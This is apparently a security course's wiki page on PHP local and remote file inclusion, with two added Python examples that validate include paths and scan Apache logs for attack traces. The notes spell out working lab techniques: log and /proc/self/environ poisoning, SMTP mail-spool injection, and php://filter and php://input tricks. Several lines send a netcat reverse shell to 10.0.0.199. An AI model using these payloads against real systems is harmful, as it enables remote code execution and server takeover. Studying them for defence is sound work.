App Vulnerabilities: File Inclusions - Paiet/SEC-335 GitHub Wiki

  • File inclusion
    • What is file inclusion?
      • The web app includes a file, chosen by user-controlled input, from a local or remote source
    • How do you test for it?
      • Vulnerability Scanners
      • Manual testing
        • Look for files being called by the web app
          • In the URL
            • file=file1.php&...
            • file=http://victim.com/resource.php&...
    • Remote
      • Calls a file from a remote server
        • Test by modifying URL to reach out to attack server for file
          • Payload = /root/Tools/test
      • We can redirect to Attack Server for malicious payload
        • DEMO: bWAPP File Inclusion (RFI)
          • Payload = /root/Tools/netkat.php
    • Local
      • Uses files from target's local server
        • Test by trying to read /etc/passwd
          • Sometimes you will need to try dir traversal
            • Explain Directory Traversal
              • Caused by user input being used in a file path without validation or normalisation
                • ../../../../../../../../etc/passwd
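The resolver below is an added example, not code from the SEC-335 notes, bWAPP or DVWA: it models how an include parameter should be validated on the server side, rejecting the RFI, LFI and traversal payloads listed above (remote URLs and wrappers, null bytes, `../` chains, absolute paths, and anything not on an explicit allowlist). The include directory `/srv/app/includes` and the allowlist entries are assumptions made for the example.

```python
import os
import re
from urllib.parse import urlsplit

# Constructed for this example: the only page fragments this app may include.
ALLOWED_INCLUDES = {"file1.php", "about.php", "contact.php"}

# Matches a raw or URL-encoded NUL byte (%00, or %2500 which decodes to %00).
NUL_RE = re.compile(r"\x00|%(?:25)?00", re.IGNORECASE)


class IncludeRejected(ValueError):
    """Raised when a user-supplied include name fails validation."""


def resolve_include(user_value: str, base_dir: str) -> str:
    """Map a user-supplied include name to an absolute path under base_dir.

    Order of checks mirrors the attack classes in the notes above:
      1. any URL scheme (http://, php://, ...)  -> remote inclusion / wrapper
      2. NUL bytes                               -> suffix truncation
      3. normalised path leaves base_dir         -> directory traversal
      4. name not on the allowlist               -> anything else
    """
    if not user_value:
        raise IncludeRejected("empty include name")
    if urlsplit(user_value).scheme:
        raise IncludeRejected("URL scheme not permitted: " + user_value)
    if NUL_RE.search(user_value):
        raise IncludeRejected("NUL byte in include name")
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_value is absolute (/etc/passwd),
    # and realpath collapses ../ chains; the commonpath test catches both.
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        raise IncludeRejected("path escapes include directory: " + candidate)
    name = os.path.relpath(candidate, base)
    if name not in ALLOWED_INCLUDES:
        raise IncludeRejected("not on include allowlist: " + name)
    return candidate


def is_safe_include(user_value: str, base_dir: str) -> bool:
    """Boolean wrapper, convenient for tests and for a WAF-style pre-check."""
    try:
        resolve_include(user_value, base_dir)
        return True
    except IncludeRejected:
        return False


if __name__ == "__main__":
    # Constructed probes with the same shapes as the payloads in the notes above.
    probes = ["file1.php", "../../../../../../../../etc/passwd", "/etc/passwd",
              "http://victim.com/resource.php", "file1.php%00",
              "php://filter/convert.base64-encode/resource=/etc/passwd", "secret.php"]
    for probe in probes:
        verdict = "allowed" if is_safe_include(probe, "/srv/app/includes") else "rejected"
        print(f"{probe!r:70} -> {verdict}")
```

The allowlist alone would stop every probe, but the scheme, NUL and `commonpath` checks are kept so that a rejected request tells the defender which attack class it matched, which is what you want to feed into logging and alerting.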

App Vulnerabilities: File Inclusions Pt.2

  • Attack methodology
    • Manipulate commonly accessible files
      1. /var/log/apache2/access.log
      • Works only if web user has read permission to this file
        • Use netcat to send a bogus GET request so the PHP payload is written into the access log
          • nc -nv 10.0.0.175 80
            GET /<?php system($_GET['cmd']); ?>
            <PRESS ENTER UNTIL YOU SEE RETURN OUTPUT>
        • Include the log file through the vulnerable parameter; the injected PHP now executes and reads cmd from the query string
          • file=/var/log/apache2/access.log&cmd=nc -nv 10.0.0.199 4444 -e /bin/bash
            • Check listener for connection
      2. /proc/self/environ
      • Older vector, so may be locked down as well
        • Works with DVWA :)
          • Use environ file to see output
            • Notice the HTTP_USER_AGENT variable, which echoes the User-Agent header of the request
              • We can modify that with Burp
                • Change User Agent to...
                  • <?php system("nc -nv 10.0.0.199 4444 -e /bin/bash");?>
      3. Exploit email
      • Telnet into the mail server on port 25
      • Spoof an email from root to www-data
      • Put the payload in the body of the email:

        EHLO (or HELO)
        MAIL FROM:<root>
        RCPT TO:<www-data>
        DATA

        <?php
        system("nc -nv 10.0.0.199 4444 -e /bin/bash");
        ?>
        .
        QUIT

      • Include /var/spool/mail/www-data and check the listener

      4. File upload utility
      • Take advantage of any file upload utils the web app provides
        • Then just use your uploaded payload file in the include
          • File type filter
            • Use Magic Number to evade file-type filter
              • GIF87a or GIF89a at the start of the file (the real GIF magic numbers)
    • Filter/Blacklist evasion
      • Add a NULL byte to the end of the included file payload
        • %00 or %2500 (double-encoded)
          • Truncates the path so any suffix the app appends (e.g. .php) is ignored; only works on PHP older than 5.3.4, which removed null-byte truncation in file paths
      • PHP Filters
        • php://
          • Straight php filter
            • file=php://filter/resource=/etc/passwd
          • Base64 encoding/decoding
            • file=php://filter/convert.base64-encode/resource=/etc/passwd
          • php://input
            • file=php://input&cmd=nc -nv 10.0.0.199 4444 -e /bin/bash
              • Intercept with Burp
                • Add reverse shell to bottom of POST request
                  • <?php echo shell_exec($_GET['cmd']);?>
                    • Check listener for shell
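From the blue-team side, every technique in these notes leaves a trace in the web server log: the PHP tag in the poisoned request line or User-Agent, the include of access.log, /proc/self/environ or the mail spool, `../` chains, `php://` wrappers, null bytes, and `file=http://` remote includes. The scanner below is an added example, not part of the course notes: it parses Apache combined-format lines and tags each request with the indicators it matches. The log lines are constructed for the example, with `<?php echo 1; ?>` standing in for any injected PHP; the rule names are my own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" log format; field names follow the standard layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicators drawn from the techniques in the notes above. Each rule is applied
# to the URL-decoded, lower-cased request line and User-Agent together.
RULES = [
    ("php_tag",        re.compile(r"<\?php|<\?=")),          # log / environ poisoning
    ("traversal",      re.compile(r"\.\.[/\\]")),            # ../../etc/passwd
    ("null_byte",      re.compile(r"\x00")),                 # %00 / %2500 truncation
    ("php_wrapper",    re.compile(r"php://")),               # php://filter, php://input
    ("remote_include", re.compile(r"=(?:https?|ftp)://")),   # file=http://...
    ("sensitive_file", re.compile(
        r"/etc/passwd|/proc/self/environ|/var/log/apache2/access\.log|/var/spool/mail/")),
]

# Constructed sample log: one benign request followed by one example of each technique.
SAMPLE_LOG = [
    '10.0.0.50 - - [10/Oct/2023:12:00:01 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.199 - - [10/Oct/2023:12:00:05 +0000] "GET /<?php echo 1; ?> HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '10.0.0.199 - - [10/Oct/2023:12:00:09 +0000] "GET /index.php?file=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.199 - - [10/Oct/2023:12:00:14 +0000] "GET /index.php?file=../../../../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
    '10.0.0.199 - - [10/Oct/2023:12:00:20 +0000] "GET /index.php?file=/proc/self/environ HTTP/1.1" 200 873 "-" "<?php echo 1; ?>"',
    '10.0.0.199 - - [10/Oct/2023:12:00:26 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2456 "-" "Mozilla/5.0"',
    '10.0.0.199 - - [10/Oct/2023:12:00:31 +0000] "GET /index.php?file=file1.php%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.199 - - [10/Oct/2023:12:00:37 +0000] "GET /index.php?file=http://10.0.0.199/resource.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]


def normalise(value: str) -> str:
    """Decode twice so %2500 -> %00 -> NUL is caught, then lower-case."""
    return unquote(unquote(value)).lower()


def scan_access_log(lines):
    """Return one finding per log line that matches at least one rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment should count these
        text = normalise(m["request"]) + "\n" + normalise(m["ua"])
        hits = [name for name, rx in RULES if rx.search(text)]
        if hits:
            findings.append({"ip": m["ip"], "time": m["time"], "request": m["request"],
                             "user_agent": m["ua"], "rules": hits})
    return findings


def summarise_by_ip(findings):
    """Count findings per source address, the first thing an analyst pivots on."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["rules"], f["request"])
    print(summarise_by_ip(scan_access_log(SAMPLE_LOG)))
```

Two caveats matter in practice: the log-poisoning request is often a 404 (it only has to be written, not served), so filter on the request text and not on status, and the same indicators belong in an alert on the include parameter itself, because a poisoned User-Agent never appears in the URL.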